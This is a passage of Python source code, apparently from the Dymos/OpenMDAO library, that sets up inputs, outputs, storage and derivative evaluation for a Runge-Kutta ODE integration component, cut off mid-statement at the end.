self._totals_of_names.append(f'state_rate_collector.state_rates:{state_name}_rate')\n self._totals_wrt_names.append(self._state_input_names[state_name])\n\n self.add_input(self._state_input_names[state_name],\n shape=options['shape'],\n units=options['units'],\n desc=f'initial value of state {state_name}')\n self.add_output(self._state_output_names[state_name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'final value of state {state_name}')\n\n state_size = np.prod(options['shape'], dtype=int)\n\n # The indices of the state in x\n self.state_idxs[state_name] = np.s_[self.x_size:self.x_size + state_size]\n self.x_size += state_size\n\n self.declare_partials(of=self._state_output_names[state_name],\n wrt='t_initial')\n\n self.declare_partials(of=self._state_output_names[state_name],\n wrt='t_duration')\n\n for state_name_wrt in self.state_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'states:{state_name_wrt}')\n\n for param_name_wrt in self.parameter_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'parameters:{param_name_wrt}')\n\n for control_name_wrt in self.control_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'controls:{control_name_wrt}')\n\n for control_name_wrt in self.polynomial_control_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'polynomial_controls:{control_name_wrt}')\n\n def _setup_parameters(self):\n if self._standalone_mode:\n self._configure_parameters_io()\n\n def _configure_parameters_io(self):\n # The indices of each parameter in p\n self.p_size = 0\n self.parameter_idxs = {}\n self._parameter_idxs_in_theta = {}\n self._parameter_idxs_in_Z = {}\n self._param_input_names = {}\n\n for param_name, options in self.parameter_options.items():\n self._param_input_names[param_name] = f'parameters:{param_name}'\n self._totals_wrt_names.append(self._param_input_names[param_name])\n\n self.add_input(self._param_input_names[param_name],\n shape=options['shape'],\n val=options['val'],\n units=options['units'],\n desc=f'value for parameter {param_name}')\n\n param_size = np.prod(options['shape'], dtype=int)\n self.parameter_idxs[param_name] = np.s_[self.p_size:self.p_size+param_size]\n self.p_size += param_size\n\n def _setup_controls(self):\n if self._standalone_mode:\n self._configure_controls_io()\n\n def _configure_controls_io(self):\n self.u_size = 0\n self.control_idxs = {}\n self._control_idxs_in_theta = {}\n self._control_idxs_in_Z = {}\n self._control_idxs_in_y = {}\n self._control_rate_idxs_in_y = {}\n self._control_rate2_idxs_in_y = {}\n self._control_input_names = {}\n self._control_output_names = {}\n self._control_rate_names = {}\n self._control_rate2_names = {}\n\n num_output_rows = self._num_output_rows\n\n if self.control_options:\n time_units = self.time_options['units']\n control_input_node_ptau = self._grid_data.node_ptau[\n self._grid_data.subset_node_indices['control_input']]\n\n for control_name, options in self.control_options.items():\n control_param_shape = (len(control_input_node_ptau),) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._control_input_names[control_name] = f'controls:{control_name}'\n self._control_output_names[control_name] = f'control_values:{control_name}'\n self._control_rate_names[control_name] = f'control_rates:{control_name}_rate'\n self._control_rate2_names[control_name] = f'control_rates:{control_name}_rate2'\n\n self._totals_wrt_names.append(self._control_input_names[control_name])\n self._totals_of_names.append(self._control_output_names[control_name])\n self._totals_of_names.append(self._control_rate_names[control_name])\n self._totals_of_names.append(self._control_rate2_names[control_name])\n\n self.add_input(self._control_input_names[control_name],\n shape=control_param_shape,\n units=options['units'],\n desc=f'values for control {control_name} at input nodes')\n\n self.add_output(self._control_output_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'values for control {control_name} at output nodes')\n\n self.add_output(self._control_rate_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=1),\n desc=f'values for rate of control {control_name} at output nodes')\n\n self.add_output(self._control_rate2_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=2),\n desc=f'values for second derivative rate of control {control_name} at output nodes')\n\n self.declare_partials(of=self._control_output_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate2_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate_names[control_name],\n wrt='t_duration',\n val=1.0)\n\n self.declare_partials(of=self._control_rate2_names[control_name],\n wrt='t_duration',\n val=1.0)\n\n self.control_idxs[control_name] = np.s_[self.u_size:self.u_size+control_param_size]\n self.u_size += control_param_size\n\n def _configure_polynomial_controls_io(self):\n self.up_size = 0\n self.polynomial_control_idxs = {}\n self._polynomial_control_idxs_in_theta = {}\n self._polynomial_control_idxs_in_Z = {}\n self._polynomial_control_input_names = {}\n self._polynomial_control_output_names = {}\n self._polynomial_control_rate_names = {}\n self._polynomial_control_rate2_names = {}\n self._polynomial_control_idxs_in_y = {}\n self._polynomial_control_rate_idxs_in_y = {}\n self._polynomial_control_rate2_idxs_in_y = {}\n\n num_output_rows = self._num_output_rows\n time_units = self.time_options['units']\n\n for name, options in self.polynomial_control_options.items():\n num_input_nodes = options['order'] + 1\n control_param_shape = (num_input_nodes,) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n\n self._polynomial_control_input_names[name] = f'polynomial_controls:{name}'\n self._polynomial_control_output_names[name] = f'polynomial_control_values:{name}'\n self._polynomial_control_rate_names[name] = f'polynomial_control_rates:{name}_rate'\n self._polynomial_control_rate2_names[name] = f'polynomial_control_rates:{name}_rate2'\n\n self._totals_wrt_names.append(self._polynomial_control_input_names[name])\n self._totals_of_names.append(self._polynomial_control_output_names[name])\n self._totals_of_names.append(self._polynomial_control_rate_names[name])\n self._totals_of_names.append(self._polynomial_control_rate2_names[name])\n\n self.add_input(self._polynomial_control_input_names[name],\n shape=control_param_shape,\n units=options['units'],\n desc=f'values for control {name} at input nodes')\n\n self.add_output(self._polynomial_control_output_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'values for control {name} at output nodes')\n\n self.add_output(self._polynomial_control_rate_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=1),\n desc=f'values for rate of control {name} at output nodes')\n\n self.add_output(self._polynomial_control_rate2_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=2),\n desc=f'values for second derivative rate of control {name} at output nodes')\n\n self.declare_partials(of=self._polynomial_control_output_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate2_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate_names[name],\n wrt='t_duration',\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate2_names[name],\n wrt='t_duration',\n val=1.0)\n\n self.polynomial_control_idxs[name] = np.s_[self.up_size:self.up_size+control_param_size]\n self.up_size += control_param_size\n\n def _setup_timeseries(self):\n if self._standalone_mode:\n self._configure_timeseries_outputs()\n\n def _configure_timeseries_outputs(self):\n \"\"\"\n Creates a mapping of {output_name : {'path': str, 'units': str, 'shape': tuple, 'idxs_in_y': numpy.Indexer}.\n\n This mapping is used to determine which variables of the ODE need to be saved in the\n algebratic outputs (y) due to being requested as timeseries outputs.\n \"\"\"\n num_output_rows = self._num_output_rows\n ode_eval = self._prob.model._get_subsystem('ode_eval.ode')\n\n self._timeseries_output_names = {}\n self._timeseries_idxs_in_y = {}\n self._filtered_timeseries_outputs = {}\n\n for ts_name, ts_opts in self.timeseries_options.items():\n patterns = list(ts_opts['outputs'].keys())\n matching_outputs = filter_outputs(patterns, ode_eval)\n\n explicit_requests = set([key for key in\n self.timeseries_options[ts_name]['outputs'].keys()\n if '*' not in key])\n\n unmatched_requests = sorted(list(set(explicit_requests) - set(matching_outputs.keys())))\n\n if unmatched_requests:\n om.issue_warning(msg='The following timeseries outputs were requested but '\n f'not found in the ODE: {\", \".join(unmatched_requests)}',\n category=om.OpenMDAOWarning)\n\n for var, var_meta in matching_outputs.items():\n if var in self.timeseries_options[ts_name]['outputs']:\n ts_var_options = self.timeseries_options[ts_name]['outputs'][var]\n # var explicitly matched\n output_name = ts_var_options['output_name'] if ts_var_options['output_name'] else var.split('.')[-1]\n units = ts_var_options.get('units', None) or var_meta.get('units', None)\n shape = var_meta['shape']\n else:\n # var matched via wildcard\n output_name = var.split('.')[-1]\n units = var_meta['units']\n shape = var_meta['shape']\n\n if output_name in self._filtered_timeseries_outputs:\n raise ValueError(f\"Requested timeseries output {var} matches multiple output names \"\n f\"within the ODE. Use `.add_timeseries_output({var}, \"\n f\"output_name=)' to disambiguate the timeseries name.\")\n\n self._filtered_timeseries_outputs[output_name] = {'path': f'ode_eval.ode.{var}',\n 'units': units,\n 'shape': shape}\n\n ode_eval.add_constraint(var)\n\n self._timeseries_output_names[output_name] = f'timeseries:{output_name}'\n self._totals_of_names.append(self._filtered_timeseries_outputs[output_name]['path'])\n\n self.add_output(self._timeseries_output_names[output_name],\n shape=(num_output_rows,) + shape,\n units=units,\n desc=f'values for timeseries output {output_name} at output nodes')\n\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt='t_initial')\n\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt='t_duration')\n\n for state_name_wrt in self.state_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._state_input_names[state_name_wrt])\n\n for param_name_wrt in self.parameter_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._param_input_names[param_name_wrt])\n\n for control_name_wrt in self.control_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._control_input_names[control_name_wrt])\n\n for control_name_wrt in self.polynomial_control_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._polynomial_control_input_names[control_name_wrt])\n\n def _setup_storage(self):\n if self._standalone_mode:\n self._configure_storage()\n\n def _configure_storage(self):\n gd = self._grid_data\n control_input_node_ptau = gd.node_ptau[gd.subset_node_indices['control_input']]\n\n # allocate the ODE parameter vector\n self.theta_size = 2 + self.p_size + self.u_size + self.up_size\n\n # allocate the integration parameter vector\n self.Z_size = self.x_size + self.theta_size\n\n # allocate the algebraic outputs vector\n self.y_size = 3 * self.u_size\n\n start_Z = 0\n for state_name, options in self.state_options.items():\n state_size = np.prod(options['shape'], dtype=int)\n self._state_idxs_in_Z[state_name] = np.s_[start_Z: start_Z+state_size]\n start_Z += state_size\n\n start_Z = self.x_size + 2\n start_theta = 2\n for param_name, options in self.parameter_options.items():\n param_size = np.prod(options['shape'], dtype=int)\n self._parameter_idxs_in_Z[param_name] = np.s_[start_Z: start_Z+param_size]\n self._parameter_idxs_in_theta[param_name] = np.s_[start_theta: start_theta+param_size]\n start_Z += param_size\n start_theta += param_size\n\n start_Z = self.x_size + 2 + self.p_size\n start_theta = 2 + self.p_size\n start_y = 0\n for control_name, options in self.control_options.items():\n control_size = np.prod(options['shape'], dtype=int)\n control_param_shape = (len(control_input_node_ptau),) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._control_idxs_in_Z[control_name] = np.s_[start_Z:start_Z+control_param_size]\n self._control_idxs_in_theta[control_name] = np.s_[start_theta:start_theta+control_param_size]\n self._control_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._control_rate_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._control_rate2_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n start_Z += control_param_size\n start_theta += control_param_size\n\n start_Z = self.x_size + 2 + self.p_size + self.u_size\n start_theta = 2 + self.p_size + self.u_size\n for name, options in self.polynomial_control_options.items():\n control_size = np.prod(options['shape'], dtype=int)\n num_input_nodes = options['order'] + 1\n control_param_shape = (num_input_nodes,) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._polynomial_control_idxs_in_Z[name] = np.s_[start_Z:start_Z+control_param_size]\n self._polynomial_control_idxs_in_theta[name] = np.s_[start_theta:start_theta+control_param_size]\n self._polynomial_control_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._polynomial_control_rate_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._polynomial_control_rate2_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n start_Z += control_param_size\n start_theta += control_param_size\n\n for output_name, options in self._filtered_timeseries_outputs.items():\n size = np.prod(options['shape'], dtype=int)\n self._timeseries_idxs_in_y[output_name] = np.s_[start_y:start_y+size]\n start_y += size\n\n N = self.options['num_steps_per_segment']\n rk = rk_methods[self.options['method']]\n num_rows = self._num_rows\n num_stages = len(rk['b'])\n num_x = self.x_size\n num_theta = self.theta_size\n num_z = num_x + num_theta\n num_y = self.y_size = start_y\n\n # The contiguous vector of state values\n self._x = np.zeros((num_rows, self.x_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of time values\n self._t = np.zeros((num_rows, 1), dtype=self._TYPE)\n\n # The contiguous vector of ODE parameter values\n self._theta = np.zeros((self.theta_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of state rates\n self._f = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of ODE algebraic outputs\n self._y = np.zeros((num_rows, num_y, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current time\n self._f_t = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current state\n self._f_x = np.zeros((self.x_size, self.x_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the parameters\n self._f_theta = np.zeros((self.x_size, self.theta_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current time\n self._y_t = np.zeros((self.y_size, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current state\n self._y_x = np.zeros((self.y_size, self.x_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the parameters\n self._y_theta = np.zeros((self.y_size, self.theta_size), dtype=self._TYPE)\n\n # Intermediate state rate storage\n self._k_q = np.zeros((num_stages, self.x_size, 1), dtype=self._TYPE)\n\n # The partial derivative of the final state vector wrt time from state update equation.\n self.px_pt = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The partial derivative of the final state vector wrt the initial state vector from the\n # state update equation.\n self.px_px = np.zeros((self.x_size, self.x_size), dtype=self._TYPE)\n\n # Derivatives pertaining to the stage ODE evaluations\n self._dTi_dZ = np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ = np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ = np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n\n # The ODE parameter derivatives wrt the integration parameters\n self._dtheta_dZ = np.zeros((num_theta, num_z), dtype=self._TYPE)\n self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n # Total derivatives of evolving quantities (x, t, h) wrt the integration parameters.\n # Let Z be [x0.ravel() t0 tp p.ravel() u.ravel()]\n self._dx_dZ = np.zeros((num_rows, num_x, num_z), dtype=self._TYPE)\n self._dx_dZ[:, :, :num_x] = np.eye(num_x, dtype=self._TYPE)\n self._dt_dZ = np.zeros((num_rows, 1, num_z), dtype=self._TYPE)\n self._dt_dZ[:, 0, num_x] = 1.0\n self._dh_dZ = np.zeros((num_rows, 1, num_z), dtype=self._TYPE)\n self._dh_dZ[:, 0, num_x+1] = 1.0 / N\n\n # Total derivatives of ODE outputs (y) wrt the integration parameters.\n self._dy_dZ = np.zeros((num_rows, num_y, num_z), dtype=self._TYPE)\n\n def setup(self):\n \"\"\"\n Add the necessary I/O and storage for the RKIntegrationComp.\n \"\"\"\n gd = self._grid_data\n N = self.options['num_steps_per_segment']\n\n # Indices to map the rows to output rows\n temp = np.zeros((gd.num_segments, N+1))\n temp[:, 0] = 1\n temp[:, -1] = 1\n self._output_src_idxs = np.where(temp.ravel() == 1)[0]\n\n self._num_output_rows = gd.num_segments * 2\n self._num_rows = gd.num_segments * (N + 1)\n\n self._totals_of_names = []\n self._totals_wrt_names = []\n\n self._setup_subprob()\n self._setup_time()\n self._setup_parameters()\n self._setup_controls()\n self._setup_states()\n self._setup_timeseries()\n self._setup_storage()\n\n def _reset_derivs(self):\n \"\"\"\n Reset the value of total derivatives prior to propagation.\n \"\"\"\n N = self.options['num_steps_per_segment']\n num_x = self.x_size\n num_theta = self.theta_size\n\n # Let Z be [x0.ravel() t0 tp p.ravel() u.ravel()]\n self._dx_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dx_dZ[0, :, :num_x] = np.eye(num_x, dtype=self._TYPE)\n self._dt_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dt_dZ[0, 0, num_x] = 1.0\n self._dh_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dh_dZ[:, 0, num_x+1] = 1.0 / N\n self._dTi_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ[...] = 0.0 # np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n self._dtheta_dZ[...] = 0.0 # np.zeros((num_theta, num_z), dtype=self._TYPE)\n self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n def _initialize_segment(self, row, inputs=None, derivs=False):\n \"\"\"\n Set the derivatives at the current row to those of the previous row.\\\n\n This is used to continue the value of derivatives over a segment boundary.\n \"\"\"\n if row == 0:\n # start x, t, and h\n for state_name in self.state_options:\n i_name = self._state_input_names[state_name]\n self._x[0, self.state_idxs[state_name], 0] = inputs[i_name].ravel()\n self._t[0, 0] = inputs['t_initial'].copy()\n\n if derivs:\n self._reset_derivs()\n else:\n # copy last x, t, h\n self._x[row, ...] = self._x[row-1, ...]\n self._t[row, ...] = self._t[row-1, ...]\n\n if derivs:\n # The 3 arrays of propagated derivatives need to copy over previous values\n self._dx_dZ[row, ...] = self._dx_dZ[row-1, ...]\n self._dt_dZ[row, ...] = self._dt_dZ[row-1, ...]\n self._dh_dZ[row, ...] = self._dh_dZ[row-1, ...]\n\n # Derivatives of the internal calls are just reset\n self._dTi_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ[...] = 0.0 # np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n\n # dtheta_dZ remains constant across segments\n # self._dtheta_dZ[...] = 0.0 # np.zeros((num_theta, num_z), dtype=self._TYPE)\n # self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n def eval_f(self, x, t, theta, f, y=None):\n \"\"\"\n Evaluate the ODE which provides the state rates for integration.\n\n Parameters\n ----------\n x : np.ndarray\n A flattened, contiguous vector of the state values.\n t : float\n The current time of the integration.\n theta : np.ndarray\n A flattened, contiguous vector of the ODE parameter values.\n f : np.ndarray\n A flattened, contiguous vector of the state rates.\n y : np.ndarray or None\n A flattened, contiguous vector of the auxiliary ODE outputs, if desired.\n If present, the first positions are reserved for the contiguous control values, rates,\n and second derivatives, respectively. The remaining elements are the requested ODE-based\n timeseries outputs.\n \"\"\"\n # transcribe time\n self._prob.set_val('time', t, units=self.time_options['units'])\n self._prob.set_val('t_initial', theta[0], units=self.time_options['units'])\n self._prob.set_val('t_duration', theta[1], units=self.time_options['units'])\n\n # transcribe states\n for name in self.state_options:\n self._prob.set_val(self._state_input_names[name], x[self.state_idxs[name], 0])\n\n # transcribe parameters\n for name in self.parameter_options:\n self._prob.set_val(self._param_input_names[name], theta[self._parameter_idxs_in_theta[name]])\n\n # transcribe controls\n for name in self.control_options:\n self._prob.set_val(self._control_input_names[name], theta[self._control_idxs_in_theta[name]])\n\n # transcribe polynomial controls\n for name in self.polynomial_control_options:\n self._prob.set_val(self._polynomial_control_input_names[name],\n theta[self._polynomial_control_idxs_in_theta[name]])\n\n # execute the ODE\n self._prob.run_model()\n\n # pack the resulting array\n for name in self.state_options:\n f[self.state_idxs[name]] = self._prob.get_val(f'state_rate_collector.state_rates:{name}_rate').ravel()\n\n if y is not None:\n # pack any control values and rates into y\n for name in self.control_options:\n output_name = self._control_output_names[name]\n rate_name = self._control_rate_names[name]\n rate2_name = self._control_rate2_names[name]\n y[self._control_idxs_in_y[name]] = self._prob.get_val(output_name).ravel()\n y[self._control_rate_idxs_in_y[name]] = self._prob.get_val(rate_name).ravel()\n y[self._control_rate2_idxs_in_y[name]] = self._prob.get_val(rate2_name).ravel()\n\n # pack any polynomial control values and rates into y\n for name in self.polynomial_control_options:\n output_name = self._polynomial_control_output_names[name]\n rate_name = self._polynomial_control_rate_names[name]\n rate2_name = self._polynomial_control_rate2_names[name]\n y[self._polynomial_control_idxs_in_y[name]] = self._prob.get_val(output_name).ravel()\n y[self._polynomial_control_rate_idxs_in_y[name]] = self._prob.get_val(rate_name).ravel()\n y[self._polynomial_control_rate2_idxs_in_y[name]] = self._prob.get_val(rate2_name).ravel()\n\n # pack any polynomial control values and rates into y\n\n for output_name, options in self._filtered_timeseries_outputs.items():\n path = options['path']\n y[self._timeseries_idxs_in_y[output_name]] = self._prob.get_val(path).ravel()\n\n def eval_f_derivs(self, x, t, theta, f_x, f_t, f_theta, y_x=None, y_t=None, y_theta=None):\n \"\"\"\n Evaluate the derivative of the ODE output rates wrt the inputs.\n\n Note that the control parameterization `u` undergoes an interpolation to provide the\n control values at any given time. The ODE is then a function of these interpolated control\n values, we'll call them `u_hat`. Technically, the derivatives wrt to `u` need to be chained\n together, but in this implementation the interpolation is part of the execution of the ODE\n and the chained derivatives are captured correctly there.\n\n Parameters\n ----------\n x : np.ndarray\n A flattened, contiguous vector of the state values.\n t : float\n The current time of the integration.\n theta : np.ndarray\n A flattened, contiguous vector of the ODE parameter values.\n f_x : np.ndarray\n A matrix of the derivative of each element of the rates `f` wrt each value in `x`.\n f_t : np.ndarray\n A matrix of the derivatives of each element of the rates `f` wrt `time`.\n f_theta : np.ndarray\n A matrix of the derivatives of each element of the rates `f` wrt the parameters `theta`.\n y_x : np.ndarray\n A matrix of the derivative of each element of the rates `y` wrt each value in `x`.\n y_t : np.ndarray\n A matrix of the derivatives of each element of the rates `y` wrt `time`.\n y_theta : np.ndarray\n A matrix of the derivatives of each element of the rates `y` wrt the parameters `theta`.\n \"\"\"\n # transcribe time\n self._prob.set_val('time', t, units=self.time_options['units'])\n self._prob.set_val('t_initial', theta[0, 0], units=self.time_options['units'])\n self._prob.set_val('t_duration', theta[1, 0], units=self.time_options['units'])\n\n # transcribe states\n for name in self.state_options:\n input_name = self._state_input_names[name]\n self._prob.set_val(input_name, x[self.state_idxs[name], 0])\n\n # transcribe parameters\n for name in self.parameter_options:\n input_name = self._param_input_names[name]\n self._prob.set_val(input_name, theta[self._parameter_idxs_in_theta[name], 0])\n\n # transcribe controls\n for name in self.control_options:\n input_name = self._control_input_names[name]\n self._prob.set_val(input_name, theta[self._control_idxs_in_theta[name], 0])\n\n for name in self.polynomial_control_options:\n input_name = self._polynomial_control_input_names[name]\n self._prob.set_val(input_name, theta[self._polynomial_control_idxs_in_theta[name], 0])\n\n # Re-run in case the inputs have changed.\n self._prob.run_model()\n\n totals = self._prob.compute_totals(of=self._totals_of_names, wrt=self._totals_wrt_names,\n use_abs_names=False)\n\n for state_name in self.state_options:\n of_name = f'state_rate_collector.state_rates:{state_name}_rate'\n idxs = self.state_idxs[state_name]\n f_t[self.state_idxs[state_name]] = totals[of_name, 'time']\n\n for state_name_wrt in self.state_options:\n idxs_wrt = self.state_idxs[state_name_wrt]\n px_px = totals[of_name, self._state_input_names[state_name_wrt]]\n f_x[idxs, idxs_wrt] = px_px.ravel()\n\n f_theta[idxs, 0] = totals[of_name, 't_initial']\n f_theta[idxs, 1] = totals[of_name, 't_duration']\n\n for param_name_wrt in self.parameter_options:\n idxs_wrt = self._parameter_idxs_in_theta[param_name_wrt]\n px_pp = totals[of_name, self._param_input_names[param_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pp.ravel()\n\n for control_name_wrt in self.control_options:\n idxs_wrt = self._control_idxs_in_theta[control_name_wrt]\n px_pu = totals[of_name, self._control_input_names[control_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pu.ravel()\n\n for pc_name_wrt in self.polynomial_control_options:\n idxs_wrt = self._polynomial_control_idxs_in_theta[pc_name_wrt]\n px_pu = totals[of_name, self._polynomial_control_input_names[pc_name_wrt]]\n f_theta[idxs, idxs_wrt] = px_pu.ravel()\n\n if y_x is not None and y_t is not None and y_theta is not None:\n for control_name in self.control_options:\n wrt_name = self._control_input_names[control_name]\n idxs_wrt = self._control_idxs_in_theta[control_name]\n of_name = self._control_output_names[control_name]\n of_rate_name = self._control_rate_names[control_name]\n of_rate2_name = self._control_rate2_names[control_name]\n\n of_idxs = self._control_idxs_in_y[control_name]\n of_rate_idxs = self._control_rate_idxs_in_y[control_name]\n of_rate2_idxs = self._control_rate2_idxs_in_y[control_name]\n\n y_t[of_idxs, 0] = totals[of_name, 'time']\n y_t[of_rate_idxs, 0] = totals[of_rate_name, 'time']\n y_t[of_rate2_idxs, 0] = totals[of_rate2_name, 'time']\n\n y_theta[of_idxs, 1] = totals[of_name, 't_duration']\n y_theta[of_rate_idxs, 1] = totals[of_rate_name, 't_duration']\n y_theta[of_rate2_idxs, 1] = totals[of_rate2_name, 't_duration']\n\n y_theta[of_idxs, idxs_wrt] = totals[of_name, wrt_name]\n y_theta[of_rate_idxs, idxs_wrt] = totals[of_rate_name, wrt_name]\n y_theta[of_rate2_idxs, idxs_wrt] = totals[of_rate2_name, wrt_name]\n\n for polynomial_control_name in self.polynomial_control_options:\n wrt_name = self._polynomial_control_input_names[polynomial_control_name]\n idxs_wrt = self._polynomial_control_idxs_in_theta[polynomial_control_name]\n of_name = self._polynomial_control_output_names[polynomial_control_name]\n of_rate_name = self._polynomial_control_rate_names[polynomial_control_name]\n of_rate2_name = self._polynomial_control_rate2_names[polynomial_control_name]\n\n of_idxs = self._polynomial_control_idxs_in_y[polynomial_control_name]\n of_rate_idxs = self._polynomial_control_rate_idxs_in_y[polynomial_control_name]\n of_rate2_idxs = self._polynomial_control_rate2_idxs_in_y[polynomial_control_name]\n\n y_t[of_idxs, 0] = totals[of_name, 'time']\n y_t[of_rate_idxs, 0] = totals[of_rate_name, 'time']\n y_t[of_rate2_idxs, 0] = totals[of_rate2_name, 'time']\n\n y_theta[of_idxs, 1] = totals[of_name, 't_duration']\n y_theta[of_rate_idxs, 1] = totals[of_rate_name, 't_duration']\n y_theta[of_rate2_idxs, 1] = totals[of_rate2_name, 't_duration']\n\n y_theta[of_idxs, idxs_wrt] = totals[of_name, wrt_name]\n y_theta[of_rate_idxs, idxs_wrt] = totals[of_rate_name, wrt_name]\n y_theta[of_rate2_idxs, idxs_wrt] = totals[of_rate2_name, wrt_name]\n\n for name, options in self._filtered_timeseries_outputs.items():\n idxs_of = self._timeseries_idxs_in_y[name]\n of_name = options['path']\n\n y_t[idxs_of, 0] = totals[options['path'], 'time']\n\n y_theta[idxs_of, 0] = totals[of_name, 't_initial']\n y_theta[idxs_of, 1] = totals[of_name, 't_duration']\n\n for state_name_wrt in self.state_options:\n idxs_wrt = self.state_idxs[state_name_wrt]\n py_px = totals[of_name, self._state_input_names[state_name_wrt]]\n y_x[idxs_of, idxs_wrt] = py_px.ravel()\n\n for param_name_wrt in self.parameter_options:\n idxs_wrt = self._parameter_idxs_in_theta[param_name_wrt]\n py_pp = totals[of_name, self._param_input_names[param_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_pp.ravel()\n\n for control_name_wrt in self.control_options:\n idxs_wrt = self._control_idxs_in_theta[control_name_wrt]\n py_puhat = totals[of_name, self._control_input_names[control_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_puhat.ravel()\n\n for pc_name_wrt in self.polynomial_control_options:\n idxs_wrt = self._polynomial_control_idxs_in_theta[pc_name_wrt]\n py_puhat = totals[of_name, self._polynomial_control_input_names[pc_name_wrt]]\n y_theta[idxs_of, idxs_wrt] = py_puhat.ravel()\n\n def _propagate(self, inputs, outputs, derivs=None):\n \"\"\"\n Propagate the states from t_initial to t_initial + t_duration, optionally computing\n the derivatives along the way and caching the current time and state values.\n\n Parameters\n ----------\n inputs : vector\n The inputs from the compute call to the RKIntegrationComp.\n outputs : vector\n The outputs from the compute call to the RKIntegrationComp.\n derivs : vector or None\n If derivatives are to be calculated in a forward mode, this is the vector of partials\n from the compute_partials call to this component. If derivatives are not to be\n computed, this should be None.\n \"\"\"\n gd = self._grid_data\n N = self.options['num_steps_per_segment']\n\n # RK Constants\n rk = rk_methods[self.options['method']]\n a = rk['a']\n b = rk['b']\n c = rk['c']\n num_stages = len(b)\n\n # Initialize states\n x = self._x\n t = self._t\n theta = self._theta\n\n # Make t_initial and t_duration the first two elements of the ODE parameter vector.\n theta[0] = inputs['t_initial'].copy()\n theta[1] = inputs['t_duration'].copy()\n\n f_x = self._f_x\n f_t = self._f_t\n f_theta = self._f_theta\n\n y_x = self._y_x\n y_t = self._y_t\n y_theta = self._y_theta\n\n # Initialize parameters\n for name in self.parameter_options:\n theta[self._parameter_idxs_in_theta[name], 0] = inputs[f'parameters:{name}'].ravel()\n\n # Initialize controls\n for name in self.control_options:\n theta[self._control_idxs_in_theta[name], 0] = inputs[f'controls:{name}'].ravel()\n\n # Initialize polynomial controls\n for name in self.polynomial_control_options:\n theta[self._polynomial_control_idxs_in_theta[name], 0] = \\\n 